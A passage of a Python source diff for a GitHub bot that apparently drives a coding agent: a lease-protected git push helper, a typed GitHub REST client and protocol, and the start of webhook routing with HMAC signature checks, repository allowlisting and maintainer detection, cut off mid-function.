`--force-with-lease` (vs plain `--force`) lets us recover from local
|
||||
history rewrites (e.g. the agent doing `git commit --amend --reset-author
|
||||
--no-edit` to fix author identity) while still refusing the push if origin
|
||||
has moved since our last fetch — i.e. it never clobbers work the bot
|
||||
didn't see.
|
||||
|
||||
When `expected_head` is supplied, this verifies the *local* HEAD matches
|
||||
before pushing — anything else means an unexpected commit raced in inside
|
||||
our own worktree between the orchestrator's preflight and this call, and
|
||||
the push is aborted with `HeadDriftError`. This is a separate concern from
|
||||
`--force-with-lease`, which compares against the remote ref.
|
||||
"""
|
||||
slot_kwargs = _slot_subprocess_kwargs(slot_uid)
|
||||
git_safe_directory = safe_directory
|
||||
if git_safe_directory is None and slot_kwargs:
|
||||
git_safe_directory = repo_dir
|
||||
|
||||
head = rev_parse_head(repo_dir, safe_directory=git_safe_directory, **slot_kwargs)
|
||||
if expected_head and head != expected_head:
|
||||
raise HeadDriftError(
|
||||
["git", "push"],
|
||||
128,
|
||||
"",
|
||||
f"HEAD changed since preflight ({expected_head[:12]} → {head[:12]}); aborting push.",
|
||||
)
|
||||
# Probe the local remote-tracking ref. Missing → first push; we pin the
|
||||
# lease to the empty value so the push only succeeds if origin still has
|
||||
# no `<branch>`. Present → pin to that SHA.
|
||||
probe = _run_git(
|
||||
["rev-parse", "--verify", "--quiet", f"refs/remotes/origin/{branch}"],
|
||||
cwd=repo_dir,
|
||||
token=None,
|
||||
safe_directory=git_safe_directory,
|
||||
**slot_kwargs,
|
||||
)
|
||||
expected_remote = probe.stdout.strip() if probe.returncode == 0 else ""
|
||||
push_extra_env: dict[str, str] | None = None
|
||||
origin = _run_git(
|
||||
["remote", "get-url", "origin"], cwd=repo_dir, token=None, safe_directory=git_safe_directory, **slot_kwargs
|
||||
)
|
||||
if origin.returncode == 0:
|
||||
local_remote = _local_remote_safe_directory(origin.stdout, cwd=repo_dir)
|
||||
if local_remote is not None:
|
||||
push_extra_env = {}
|
||||
_append_safe_directory(push_extra_env, local_remote)
|
||||
lease = f"--force-with-lease=refs/heads/{branch}:{expected_remote}"
|
||||
args = ["push", lease, "--set-upstream", "origin", branch]
|
||||
_check(
|
||||
_run_git(
|
||||
args, cwd=repo_dir, token=token, extra_env=push_extra_env, safe_directory=git_safe_directory, **slot_kwargs
|
||||
),
|
||||
["git", *args],
|
||||
)
|
||||
return PushResult(head=head, branch=branch)
|
||||
|
||||
|
||||
__all__ = [
|
||||
"AUTH_ENV_VAR",
|
||||
"GitCommandError",
|
||||
"HeadDriftError",
|
||||
"PushResult",
|
||||
"clone",
|
||||
"fetch_prune",
|
||||
"fetch_ref",
|
||||
"push",
|
||||
"redact_credentials",
|
||||
"rev_parse_head",
|
||||
]
|
||||
@@ -0,0 +1,86 @@
|
||||
"""Structural protocol shared by `GitHubClient` and `GitHubProxyClient`.
|
||||
|
||||
Callers (worker, host tools, tasks, server, CLI) reference `GitHubBackend`
|
||||
so they accept either the direct PAT-bearing REST client or the HMAC-RPC
|
||||
proxy client without changing signatures. Both impls return the same typed
|
||||
dataclasses (`IssueInfo`, `RepoInfo`, …) defined in `github_client`.
|
||||
"""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
from typing import Protocol
|
||||
|
||||
from robomp.github_client import (
|
||||
CommentInfo,
|
||||
IssueInfo,
|
||||
IssueSummary,
|
||||
PullRequestInfo,
|
||||
PullRequestReviewInfo,
|
||||
ReactionInfo,
|
||||
RepoInfo,
|
||||
ReviewCommentInfo,
|
||||
)
|
||||
|
||||
|
||||
class GitHubBackend(Protocol):
|
||||
"""Methods every caller in roboomp uses against GitHub."""
|
||||
|
||||
# ---- reads ----
|
||||
async def get_repo(self, repo: str) -> RepoInfo: ...
|
||||
|
||||
async def get_issue(self, repo: str, number: int) -> IssueInfo: ...
|
||||
|
||||
async def list_closing_pull_requests(self, repo: str, number: int) -> tuple[int, ...]: ...
|
||||
|
||||
async def get_pull_request(self, repo: str, number: int) -> PullRequestInfo: ...
|
||||
|
||||
async def list_issues(
|
||||
self,
|
||||
repo: str,
|
||||
*,
|
||||
state: str = "open",
|
||||
limit: int = 30,
|
||||
) -> list[IssueSummary]: ...
|
||||
|
||||
async def list_comments(self, repo: str, number: int) -> list[CommentInfo]: ...
|
||||
|
||||
async def list_review_comments(self, repo: str, pr_number: int) -> list[ReviewCommentInfo]: ...
|
||||
|
||||
async def list_pr_reviews(self, repo: str, pr_number: int) -> list[PullRequestReviewInfo]: ...
|
||||
|
||||
async def get_authenticated_login(self) -> str: ...
|
||||
|
||||
# ---- writes ----
|
||||
async def post_comment(self, repo: str, number: int, body: str) -> CommentInfo: ...
|
||||
|
||||
async def open_pull_request(
|
||||
self,
|
||||
*,
|
||||
repo: str,
|
||||
head: str,
|
||||
base: str,
|
||||
title: str,
|
||||
body: str,
|
||||
draft: bool = False,
|
||||
maintainer_can_modify: bool = True,
|
||||
) -> PullRequestInfo: ...
|
||||
|
||||
async def request_reviewers(
|
||||
self,
|
||||
*,
|
||||
repo: str,
|
||||
pr_number: int,
|
||||
reviewers: list[str] | None = None,
|
||||
team_reviewers: list[str] | None = None,
|
||||
) -> None: ...
|
||||
|
||||
async def add_issue_labels(self, repo: str, number: int, labels: list[str]) -> tuple[str, ...]: ...
|
||||
|
||||
async def add_assignees(self, repo: str, number: int, assignees: list[str]) -> None: ...
|
||||
|
||||
async def list_comment_reactions(self, repo: str, comment_id: int) -> tuple[ReactionInfo, ...]: ...
|
||||
|
||||
async def close_issue(self, repo: str, number: int, *, reason: str = "completed") -> None: ...
|
||||
|
||||
|
||||
__all__ = ["GitHubBackend"]
|
||||
@@ -0,0 +1,543 @@
|
||||
"""Minimal typed GitHub REST client (PAT auth, httpx)."""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
import logging
|
||||
import time
|
||||
from collections.abc import Mapping
|
||||
from dataclasses import dataclass
|
||||
from typing import Any
|
||||
|
||||
import httpx
|
||||
|
||||
log = logging.getLogger(__name__)
|
||||
|
||||
GITHUB_API = "https://api.github.com"
|
||||
ACCEPT = "application/vnd.github+json"
|
||||
API_VERSION = "2022-11-28"
|
||||
|
||||
|
||||
class GitHubError(RuntimeError):
|
||||
"""Raised on non-2xx responses from GitHub."""
|
||||
|
||||
def __init__(self, status: int, message: str, *, retry_after: float | None = None) -> None:
|
||||
super().__init__(f"GitHub {status}: {message}")
|
||||
self.status = status
|
||||
self.message = message
|
||||
self.retry_after = retry_after
|
||||
|
||||
|
||||
@dataclass(slots=True, frozen=True)
|
||||
class IssueInfo:
|
||||
repo: str
|
||||
number: int
|
||||
title: str
|
||||
body: str
|
||||
state: str
|
||||
author: str
|
||||
labels: tuple[str, ...]
|
||||
is_pull_request: bool
|
||||
|
||||
|
||||
@dataclass(slots=True, frozen=True)
|
||||
class CommentInfo:
|
||||
id: int
|
||||
author: str
|
||||
body: str
|
||||
created_at: str
|
||||
|
||||
|
||||
@dataclass(slots=True, frozen=True)
|
||||
class RepoInfo:
|
||||
full_name: str
|
||||
default_branch: str
|
||||
clone_url: str
|
||||
private: bool
|
||||
|
||||
|
||||
@dataclass(slots=True, frozen=True)
|
||||
class PullRequestInfo:
|
||||
repo: str
|
||||
number: int
|
||||
html_url: str
|
||||
head_ref: str
|
||||
base_ref: str
|
||||
state: str
|
||||
author: str = ""
|
||||
head_repo: str = ""
|
||||
|
||||
|
||||
@dataclass(slots=True, frozen=True)
|
||||
class ReviewCommentInfo:
|
||||
"""In-line PR review comment (attached to a file/line)."""
|
||||
|
||||
id: int
|
||||
author: str
|
||||
body: str
|
||||
path: str
|
||||
line: int | None
|
||||
created_at: str
|
||||
|
||||
|
||||
@dataclass(slots=True, frozen=True)
|
||||
class PullRequestReviewInfo:
|
||||
"""Top-level PR review (the summary block, not the inline comments)."""
|
||||
|
||||
id: int
|
||||
author: str
|
||||
body: str
|
||||
state: str # APPROVED / CHANGES_REQUESTED / COMMENTED
|
||||
submitted_at: str
|
||||
|
||||
|
||||
@dataclass(slots=True, frozen=True)
|
||||
class IssueSummary:
|
||||
"""Lightweight projection of an issue for list views (no body)."""
|
||||
|
||||
repo: str
|
||||
number: int
|
||||
title: str
|
||||
state: str
|
||||
author: str
|
||||
labels: tuple[str, ...]
|
||||
comments: int
|
||||
updated_at: str
|
||||
created_at: str
|
||||
html_url: str
|
||||
|
||||
|
||||
@dataclass(slots=True, frozen=True)
|
||||
class ReactionInfo:
|
||||
"""A reaction on an issue/comment.
|
||||
|
||||
`content` is GitHub's reaction string: `+1`, `-1`, `laugh`, `hooray`,
|
||||
`confused`, `heart`, `rocket`, `eyes`. The auto-close scheduler only
|
||||
looks at `-1` (👎) reactions from the issue's original author.
|
||||
"""
|
||||
|
||||
content: str
|
||||
user_login: str
|
||||
user_type: str
|
||||
|
||||
|
||||
def _parse_retry_after(resp: httpx.Response) -> float | None:
|
||||
ra = resp.headers.get("retry-after")
|
||||
if ra:
|
||||
try:
|
||||
return float(ra)
|
||||
except ValueError:
|
||||
pass
|
||||
reset = resp.headers.get("x-ratelimit-reset")
|
||||
if reset:
|
||||
try:
|
||||
return max(0.0, float(reset) - time.time())
|
||||
except ValueError:
|
||||
pass
|
||||
return None
|
||||
|
||||
|
||||
class GitHubClient:
|
||||
"""Async + sync facades over a small slice of the GitHub REST API."""
|
||||
|
||||
def __init__(self, token: str, *, transport: httpx.BaseTransport | None = None) -> None:
|
||||
self._token = token
|
||||
self._headers = {
|
||||
"Authorization": f"Bearer {token}",
|
||||
"Accept": ACCEPT,
|
||||
"X-GitHub-Api-Version": API_VERSION,
|
||||
"User-Agent": "robomp/0.1",
|
||||
}
|
||||
self._transport = transport
|
||||
|
||||
def _client(self) -> httpx.Client:
|
||||
return httpx.Client(
|
||||
base_url=GITHUB_API,
|
||||
headers=self._headers,
|
||||
transport=self._transport,
|
||||
timeout=httpx.Timeout(30.0, connect=10.0),
|
||||
follow_redirects=True,
|
||||
)
|
||||
|
||||
def _async_client(self) -> httpx.AsyncClient:
|
||||
return httpx.AsyncClient(
|
||||
base_url=GITHUB_API,
|
||||
headers=self._headers,
|
||||
transport=self._transport, # type: ignore[arg-type]
|
||||
timeout=httpx.Timeout(30.0, connect=10.0),
|
||||
follow_redirects=True,
|
||||
)
|
||||
|
||||
# ---- request helpers ----
|
||||
def _check(self, resp: httpx.Response) -> Any:
|
||||
if resp.status_code >= 400:
|
||||
retry_after = _parse_retry_after(resp)
|
||||
try:
|
||||
msg = resp.json().get("message", resp.text)
|
||||
except Exception:
|
||||
msg = resp.text
|
||||
raise GitHubError(resp.status_code, str(msg), retry_after=retry_after)
|
||||
if resp.status_code >= 300:
|
||||
# Redirect we couldn't (or weren't asked to) follow. GitHub uses 301
|
||||
# for transferred repos / issues. Surface as a normal error so host
|
||||
# tools map it to RpcCommandError instead of mis-parsing the body.
|
||||
location = resp.headers.get("location", "")
|
||||
raise GitHubError(
|
||||
resp.status_code,
|
||||
f"unexpected redirect to {location!r}; resource may have moved",
|
||||
)
|
||||
if resp.status_code == 204 or not resp.content:
|
||||
return None
|
||||
return resp.json()
|
||||
|
||||
def request_sync(
|
||||
self, method: str, path: str, *, json: Mapping[str, Any] | None = None, params: Mapping[str, Any] | None = None
|
||||
) -> Any:
|
||||
with self._client() as client:
|
||||
resp = client.request(method, path, json=json, params=params)
|
||||
return self._check(resp)
|
||||
|
||||
async def request(
|
||||
self, method: str, path: str, *, json: Mapping[str, Any] | None = None, params: Mapping[str, Any] | None = None
|
||||
) -> Any:
|
||||
async with self._async_client() as client:
|
||||
resp = await client.request(method, path, json=json, params=params)
|
||||
return self._check(resp)
|
||||
|
||||
# ---- repos / issues / comments / PRs ----
|
||||
async def get_repo(self, repo: str) -> RepoInfo:
|
||||
data = await self.request("GET", f"/repos/{repo}")
|
||||
return _repo_from_payload(data)
|
||||
|
||||
async def get_issue(self, repo: str, number: int) -> IssueInfo:
|
||||
data = await self.request("GET", f"/repos/{repo}/issues/{number}")
|
||||
return _issue_from_payload(repo, data)
|
||||
|
||||
async def list_closing_pull_requests(self, repo: str, number: int) -> tuple[int, ...]:
|
||||
"""Return PR numbers currently linked to issue ``number`` via "Closes"/"Fixes"
|
||||
keywords or the Development panel.
|
||||
|
||||
Walks ``GET /repos/{repo}/issues/{N}/timeline`` and computes net
|
||||
``connected`` − ``disconnected`` events for sources that are pull
|
||||
requests. Only PRs whose timeline source carries ``state == "open"``
|
||||
are returned — a merged or closed PR no longer needs the bot's work.
|
||||
|
||||
Pagination intentionally skipped: a just-opened issue has at most a
|
||||
handful of timeline entries, and the bot only consults this on
|
||||
``issues.opened`` triage.
|
||||
"""
|
||||
data = await self.request(
|
||||
"GET",
|
||||
f"/repos/{repo}/issues/{number}/timeline",
|
||||
params={"per_page": 100},
|
||||
)
|
||||
linked: set[int] = set()
|
||||
states: dict[int, str] = {}
|
||||
for event in data or []:
|
||||
if not isinstance(event, Mapping):
|
||||
continue
|
||||
ev = event.get("event")
|
||||
source = event.get("source") or {}
|
||||
src_issue = source.get("issue") if isinstance(source, Mapping) else None
|
||||
if not isinstance(src_issue, Mapping) or "pull_request" not in src_issue:
|
||||
continue
|
||||
pr_number = src_issue.get("number")
|
||||
if not isinstance(pr_number, int):
|
||||
continue
|
||||
states[pr_number] = str(src_issue.get("state") or "open")
|
||||
if ev == "connected":
|
||||
linked.add(pr_number)
|
||||
elif ev == "disconnected":
|
||||
linked.discard(pr_number)
|
||||
return tuple(sorted(n for n in linked if states.get(n, "open") == "open"))
|
||||
|
||||
async def get_pull_request(self, repo: str, number: int) -> PullRequestInfo:
|
||||
data = await self.request("GET", f"/repos/{repo}/pulls/{number}")
|
||||
return _pr_from_payload(repo, data)
|
||||
|
||||
async def list_issues(
|
||||
self,
|
||||
repo: str,
|
||||
*,
|
||||
state: str = "open",
|
||||
limit: int = 30,
|
||||
) -> list[IssueSummary]:
|
||||
"""List recent issues for `repo`, newest-updated first. Excludes pull requests.
|
||||
|
||||
`state` is one of `open`, `closed`, `all`. `limit` is capped at 100 by the
|
||||
GitHub `per_page`; we don't paginate here — the dashboard browse view shows
|
||||
a recent slice, not every issue ever.
|
||||
"""
|
||||
if state not in ("open", "closed", "all"):
|
||||
raise ValueError(f"invalid state: {state!r}")
|
||||
per_page = max(1, min(int(limit), 100))
|
||||
data = await self.request(
|
||||
"GET",
|
||||
f"/repos/{repo}/issues",
|
||||
params={"state": state, "per_page": per_page, "sort": "updated", "direction": "desc"},
|
||||
)
|
||||
out: list[IssueSummary] = []
|
||||
for item in data or []:
|
||||
if "pull_request" in item:
|
||||
continue # GitHub's /issues endpoint also returns PRs; skip them.
|
||||
user = item.get("user") or {}
|
||||
labels_raw = item.get("labels") or []
|
||||
out.append(
|
||||
IssueSummary(
|
||||
repo=repo,
|
||||
number=int(item["number"]),
|
||||
title=str(item.get("title") or ""),
|
||||
state=str(item.get("state") or "open"),
|
||||
author=str(user.get("login") or ""),
|
||||
labels=tuple(str(lbl["name"]) if isinstance(lbl, dict) else str(lbl) for lbl in labels_raw),
|
||||
comments=int(item.get("comments") or 0),
|
||||
updated_at=str(item.get("updated_at") or ""),
|
||||
created_at=str(item.get("created_at") or ""),
|
||||
html_url=str(item.get("html_url") or ""),
|
||||
)
|
||||
)
|
||||
return out
|
||||
|
||||
async def list_comments(self, repo: str, number: int) -> list[CommentInfo]:
|
||||
data = await self.request("GET", f"/repos/{repo}/issues/{number}/comments", params={"per_page": 100})
|
||||
return [_comment_from_payload(item) for item in (data or [])]
|
||||
|
||||
async def list_review_comments(self, repo: str, pr_number: int) -> list[ReviewCommentInfo]:
|
||||
"""List inline review comments on a PR (the ones attached to a path:line)."""
|
||||
data = await self.request(
|
||||
"GET",
|
||||
f"/repos/{repo}/pulls/{pr_number}/comments",
|
||||
params={"per_page": 100},
|
||||
)
|
||||
out: list[ReviewCommentInfo] = []
|
||||
for item in data or []:
|
||||
user = item.get("user") or {}
|
||||
line = item.get("line")
|
||||
if not isinstance(line, int):
|
||||
orig = item.get("original_line")
|
||||
line = orig if isinstance(orig, int) else None
|
||||
out.append(
|
||||
ReviewCommentInfo(
|
||||
id=int(item.get("id") or 0),
|
||||
author=str(user.get("login") or ""),
|
||||
body=str(item.get("body") or ""),
|
||||
path=str(item.get("path") or ""),
|
||||
line=line,
|
||||
created_at=str(item.get("created_at") or ""),
|
||||
)
|
||||
)
|
||||
return out
|
||||
|
||||
async def list_pr_reviews(self, repo: str, pr_number: int) -> list[PullRequestReviewInfo]:
|
||||
"""List top-level reviews on a PR. Empty-body reviews are skipped — they
|
||||
carry no novel text beyond what the inline comments + merge state convey."""
|
||||
data = await self.request(
|
||||
"GET",
|
||||
f"/repos/{repo}/pulls/{pr_number}/reviews",
|
||||
params={"per_page": 100},
|
||||
)
|
||||
out: list[PullRequestReviewInfo] = []
|
||||
for item in data or []:
|
||||
user = item.get("user") or {}
|
||||
body = str(item.get("body") or "").strip()
|
||||
if not body:
|
||||
continue
|
||||
out.append(
|
||||
PullRequestReviewInfo(
|
||||
id=int(item.get("id") or 0),
|
||||
author=str(user.get("login") or ""),
|
||||
body=body,
|
||||
state=str(item.get("state") or ""),
|
||||
submitted_at=str(item.get("submitted_at") or item.get("created_at") or ""),
|
||||
)
|
||||
)
|
||||
return out
|
||||
|
||||
async def post_comment(self, repo: str, number: int, body: str) -> CommentInfo:
|
||||
data = await self.request(
|
||||
"POST",
|
||||
f"/repos/{repo}/issues/{number}/comments",
|
||||
json={"body": body},
|
||||
)
|
||||
return _comment_from_payload(data)
|
||||
|
||||
async def open_pull_request(
|
||||
self,
|
||||
*,
|
||||
repo: str,
|
||||
head: str,
|
||||
base: str,
|
||||
title: str,
|
||||
body: str,
|
||||
draft: bool = False,
|
||||
maintainer_can_modify: bool = True,
|
||||
) -> PullRequestInfo:
|
||||
data = await self.request(
|
||||
"POST",
|
||||
f"/repos/{repo}/pulls",
|
||||
json={
|
||||
"title": title,
|
||||
"body": body,
|
||||
"head": head,
|
||||
"base": base,
|
||||
"draft": draft,
|
||||
"maintainer_can_modify": maintainer_can_modify,
|
||||
},
|
||||
)
|
||||
return _pr_from_payload(repo, data)
|
||||
|
||||
async def request_reviewers(
|
||||
self,
|
||||
*,
|
||||
repo: str,
|
||||
pr_number: int,
|
||||
reviewers: list[str] | None = None,
|
||||
team_reviewers: list[str] | None = None,
|
||||
) -> None:
|
||||
payload: dict[str, Any] = {}
|
||||
if reviewers:
|
||||
payload["reviewers"] = reviewers
|
||||
if team_reviewers:
|
||||
payload["team_reviewers"] = team_reviewers
|
||||
if not payload:
|
||||
return
|
||||
await self.request(
|
||||
"POST",
|
||||
f"/repos/{repo}/pulls/{pr_number}/requested_reviewers",
|
||||
json=payload,
|
||||
)
|
||||
|
||||
async def add_issue_labels(self, repo: str, number: int, labels: list[str]) -> tuple[str, ...]:
|
||||
"""Append labels to an issue (or PR). Returns the full label set after the add.
|
||||
|
||||
Uses `POST /repos/{owner}/{repo}/issues/{n}/labels` which is *additive* —
|
||||
we never remove or overwrite existing labels.
|
||||
"""
|
||||
if not labels:
|
||||
return ()
|
||||
data = await self.request(
|
||||
"POST",
|
||||
f"/repos/{repo}/issues/{number}/labels",
|
||||
json={"labels": labels},
|
||||
)
|
||||
return tuple(str(lbl["name"]) if isinstance(lbl, dict) else str(lbl) for lbl in (data or []))
|
||||
|
||||
async def add_assignees(self, repo: str, number: int, assignees: list[str]) -> None:
|
||||
if not assignees:
|
||||
return
|
||||
await self.request(
|
||||
"POST",
|
||||
f"/repos/{repo}/issues/{number}/assignees",
|
||||
json={"assignees": assignees},
|
||||
)
|
||||
|
||||
async def list_comment_reactions(self, repo: str, comment_id: int) -> tuple[ReactionInfo, ...]:
|
||||
"""Reactions on an issue comment, filtered server-side to 👎 (`content=-1`).
|
||||
|
||||
The auto-close scheduler only consults 👎 reactions; filtering server-side
|
||||
keeps payloads small even on noisy threads. Returns reactions in the
|
||||
order GitHub provides (creation order).
|
||||
"""
|
||||
data = await self.request(
|
||||
"GET",
|
||||
f"/repos/{repo}/issues/comments/{comment_id}/reactions",
|
||||
params={"content": "-1", "per_page": 100},
|
||||
)
|
||||
return tuple(_reaction_from_payload(item) for item in (data or []))
|
||||
|
||||
async def close_issue(self, repo: str, number: int, *, reason: str = "completed") -> None:
|
||||
"""Close an issue with `state_reason` (`completed`/`not_planned`/`reopened`)."""
|
||||
await self.request(
|
||||
"PATCH",
|
||||
f"/repos/{repo}/issues/{number}",
|
||||
json={"state": "closed", "state_reason": reason},
|
||||
)
|
||||
|
||||
async def get_authenticated_login(self) -> str:
|
||||
data = await self.request("GET", "/user")
|
||||
return str(data["login"])
|
||||
|
||||
|
||||
def _repo_from_payload(data: Mapping[str, Any]) -> RepoInfo:
|
||||
return RepoInfo(
|
||||
full_name=str(data["full_name"]),
|
||||
default_branch=str(data["default_branch"]),
|
||||
clone_url=str(data["clone_url"]),
|
||||
private=bool(data.get("private", False)),
|
||||
)
|
||||
|
||||
|
||||
def _issue_from_payload(repo: str, data: Mapping[str, Any]) -> IssueInfo:
|
||||
labels_raw = data.get("labels") or []
|
||||
labels = tuple(str(lbl["name"]) if isinstance(lbl, dict) else str(lbl) for lbl in labels_raw)
|
||||
user = data.get("user") or {}
|
||||
return IssueInfo(
|
||||
repo=repo,
|
||||
number=int(data["number"]),
|
||||
title=str(data.get("title") or ""),
|
||||
body=str(data.get("body") or ""),
|
||||
state=str(data.get("state") or "open"),
|
||||
author=str(user.get("login") or ""),
|
||||
labels=labels,
|
||||
is_pull_request="pull_request" in data,
|
||||
)
|
||||
|
||||
|
||||
def _pr_from_payload(repo: str, data: Mapping[str, Any]) -> PullRequestInfo:
|
||||
head = data.get("head") or {}
|
||||
base = data.get("base") or {}
|
||||
user = data.get("user") or {}
|
||||
head_repo = head.get("repo") if isinstance(head, Mapping) else None
|
||||
return PullRequestInfo(
|
||||
repo=repo,
|
||||
number=int(data["number"]),
|
||||
html_url=str(data["html_url"]),
|
||||
head_ref=str(head.get("ref") or "") if isinstance(head, Mapping) else "",
|
||||
base_ref=str(base.get("ref") or "") if isinstance(base, Mapping) else "",
|
||||
state=str(data.get("state") or "open"),
|
||||
author=str(user.get("login") or "") if isinstance(user, Mapping) else "",
|
||||
head_repo=str(head_repo.get("full_name") or "") if isinstance(head_repo, Mapping) else "",
|
||||
)
|
||||
|
||||
|
||||
def _comment_from_payload(data: Mapping[str, Any]) -> CommentInfo:
|
||||
user = data.get("user") or {}
|
||||
return CommentInfo(
|
||||
id=int(data["id"]),
|
||||
author=str(user.get("login") or ""),
|
||||
body=str(data.get("body") or ""),
|
||||
created_at=str(data.get("created_at") or ""),
|
||||
)
|
||||
|
||||
|
||||
def _reaction_from_payload(data: Mapping[str, Any]) -> ReactionInfo:
|
||||
user = data.get("user") or {}
|
||||
return ReactionInfo(
|
||||
content=str(data.get("content") or ""),
|
||||
user_login=str(user.get("login") or "") if isinstance(user, Mapping) else "",
|
||||
user_type=str(user.get("type") or "") if isinstance(user, Mapping) else "",
|
||||
)
|
||||
|
||||
|
||||
def parse_issue_payload(payload: Mapping[str, Any]) -> tuple[RepoInfo, IssueInfo]:
|
||||
"""Build typed records from a webhook payload (issues.opened, etc.)."""
|
||||
repo_payload = payload["repository"]
|
||||
repo = _repo_from_payload(repo_payload)
|
||||
issue = _issue_from_payload(repo.full_name, payload["issue"])
|
||||
return repo, issue
|
||||
|
||||
|
||||
__all__ = [
|
||||
"ACCEPT",
|
||||
"API_VERSION",
|
||||
"CommentInfo",
|
||||
"GitHubClient",
|
||||
"GitHubError",
|
||||
"IssueInfo",
|
||||
"IssueSummary",
|
||||
"PullRequestInfo",
|
||||
"PullRequestReviewInfo",
|
||||
"ReactionInfo",
|
||||
"RepoInfo",
|
||||
"ReviewCommentInfo",
|
||||
"parse_issue_payload",
|
||||
]
|
||||
@@ -0,0 +1,330 @@
|
||||
"""Typed webhook payload parsing + dispatch routing."""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
import hashlib
|
||||
import hmac
|
||||
import logging
|
||||
import re
|
||||
from collections.abc import Callable, Mapping
|
||||
from dataclasses import dataclass
|
||||
from typing import Any, Literal
|
||||
|
||||
from robomp.db import issue_key
|
||||
from robomp.pragmas import parse_pragmas
|
||||
|
||||
log = logging.getLogger(__name__)
|
||||
|
||||
Decision = Literal["queue", "skip"]
|
||||
|
||||
|
||||
@dataclass(slots=True, frozen=True)
|
||||
class RouteDecision:
|
||||
decision: Decision
|
||||
task: str | None
|
||||
repo: str | None
|
||||
issue_key: str | None
|
||||
reason: str
|
||||
submitter: str | None = None
|
||||
association: str | None = None
|
||||
directive: bool = False
|
||||
directive_body: str | None = None
|
||||
directive_author: str | None = None
|
||||
directive_pragmas: tuple[tuple[str, str], ...] = ()
|
||||
|
||||
@property
|
||||
def should_queue(self) -> bool:
|
||||
return self.decision == "queue"
|
||||
|
||||
|
||||
def verify_signature(secret: str, body: bytes, signature_header: str | None) -> bool:
|
||||
"""Constant-time HMAC-SHA256 verification of `X-Hub-Signature-256`."""
|
||||
if not signature_header or not signature_header.startswith("sha256="):
|
||||
return False
|
||||
expected = hmac.new(secret.encode("utf-8"), body, hashlib.sha256).hexdigest()
|
||||
provided = signature_header.removeprefix("sha256=")
|
||||
return hmac.compare_digest(expected, provided)
|
||||
|
||||
|
||||
def _repo_full_name(payload: Mapping[str, Any]) -> str | None:
|
||||
repo = payload.get("repository")
|
||||
if isinstance(repo, dict):
|
||||
full = repo.get("full_name")
|
||||
if isinstance(full, str):
|
||||
return full
|
||||
return None
|
||||
|
||||
|
||||
PrIssueResolver = Callable[[str, int], str | None] | None
|
||||
|
||||
|
||||
def _is_bot_account(user: Mapping[str, Any] | None, bot_login: str) -> bool:
|
||||
if not isinstance(user, Mapping):
|
||||
return False
|
||||
login = str(user.get("login") or "")
|
||||
if not login:
|
||||
return False
|
||||
if login == bot_login:
|
||||
return True
|
||||
if login.endswith("[bot]"):
|
||||
return True
|
||||
if str(user.get("type") or "") == "Bot":
|
||||
return True
|
||||
return False
|
||||
|
||||
|
||||
def _submitter_info(obj: Mapping[str, Any] | None) -> tuple[str | None, str | None]:
|
||||
"""Extract `(login, author_association)` from an issue/comment object."""
|
||||
if not isinstance(obj, Mapping):
|
||||
return None, None
|
||||
user = obj.get("user")
|
||||
login: str | None = None
|
||||
if isinstance(user, Mapping):
|
||||
raw = user.get("login")
|
||||
if isinstance(raw, str) and raw:
|
||||
login = raw
|
||||
assoc = obj.get("author_association")
|
||||
return login, (str(assoc) if isinstance(assoc, str) and assoc else None)
|
||||
|
||||
|
||||
def extract_mention(body: str | None, bot_login: str) -> str | None:
|
||||
"""Return `body` with `@<bot_login>` mentions stripped, or None if no mention.
|
||||
|
||||
Match is case-insensitive and word-boundary aware (hyphens in logins are
|
||||
part of the token, so `@robomp-bot` does NOT match `@robomp-bot-extra`).
|
||||
"""
|
||||
if not isinstance(body, str) or not body:
|
||||
return None
|
||||
login = bot_login.strip()
|
||||
if not login:
|
||||
return None
|
||||
pattern = re.compile(
|
||||
rf"(?<![A-Za-z0-9_-])@{re.escape(login)}(?![A-Za-z0-9_-])",
|
||||
re.IGNORECASE,
|
||||
)
|
||||
if not pattern.search(body):
|
||||
return None
|
||||
stripped = pattern.sub("", body)
|
||||
# Collapse the whitespace the strip leaves behind without mangling the rest.
|
||||
stripped = re.sub(r"[ \t]+", " ", stripped)
|
||||
stripped = re.sub(r"\n[ \t]+", "\n", stripped)
|
||||
return stripped.strip()
|
||||
|
||||
|
||||
def is_maintainer(
|
||||
login: str | None,
|
||||
association: str | None,
|
||||
*,
|
||||
maintainers: frozenset[str],
|
||||
) -> bool:
|
||||
"""A maintainer is anyone in `maintainers` or with a trusted association."""
|
||||
if isinstance(login, str) and login and login.lower() in maintainers:
|
||||
return True
|
||||
if isinstance(association, str) and association.upper() in TRUSTED_ASSOCIATIONS:
|
||||
return True
|
||||
return False
|
||||
|
||||
|
||||
def route(
|
||||
event_type: str,
|
||||
payload: Mapping[str, Any],
|
||||
*,
|
||||
allowlist: frozenset[str],
|
||||
bot_login: str,
|
||||
maintainers: frozenset[str] = frozenset(),
|
||||
reviewer_bots: frozenset[str] = frozenset(),
|
||||
resolve_issue_from_pr: PrIssueResolver = None,
|
||||
) -> RouteDecision:
|
||||
"""Decide whether and how to handle a webhook event.
|
||||
|
||||
`resolve_issue_from_pr(repo, pr_number)` maps a PR number back to its
|
||||
originating-issue key (e.g. `octo/widget#42`). PR-derived events prefer
|
||||
that key so follow-ups serialize with the original issue. If the mapping
|
||||
is missing, the event is still actionable and falls back to the PR's own
|
||||
issue key (`octo/widget#1080`).
|
||||
"""
|
||||
repo = _repo_full_name(payload)
|
||||
if repo is None or repo.lower() not in allowlist:
|
||||
return RouteDecision("skip", None, repo, None, "repo not on allowlist")
|
||||
|
||||
action = str(payload.get("action") or "")
|
||||
|
||||
def _resolve_pr_key(pr_number: int) -> str:
|
||||
if resolve_issue_from_pr is not None:
|
||||
resolved = resolve_issue_from_pr(repo, pr_number) # type: ignore[arg-type]
|
||||
if resolved:
|
||||
return resolved
|
||||
return issue_key(repo, pr_number) # type: ignore[arg-type]
|
||||
|
||||
def _reviewer_bot_login(user: Mapping[str, Any] | None) -> str | None:
|
||||
"""Return the lowercased login if this user is a configured reviewer bot."""
|
||||
if not isinstance(user, Mapping):
|
||||
return None
|
||||
login = str(user.get("login") or "").lower()
|
||||
return login if login and login in reviewer_bots else None
|
||||
|
||||
def _directive_kwargs(comment: Mapping[str, Any] | None, login: str | None, assoc: str | None) -> dict[str, Any]:
|
||||
"""Decide whether this comment is a directive (reviewer-bot OR maintainer-mention)."""
|
||||
if not isinstance(comment, Mapping):
|
||||
return {}
|
||||
body = str(comment.get("body") or "")
|
||||
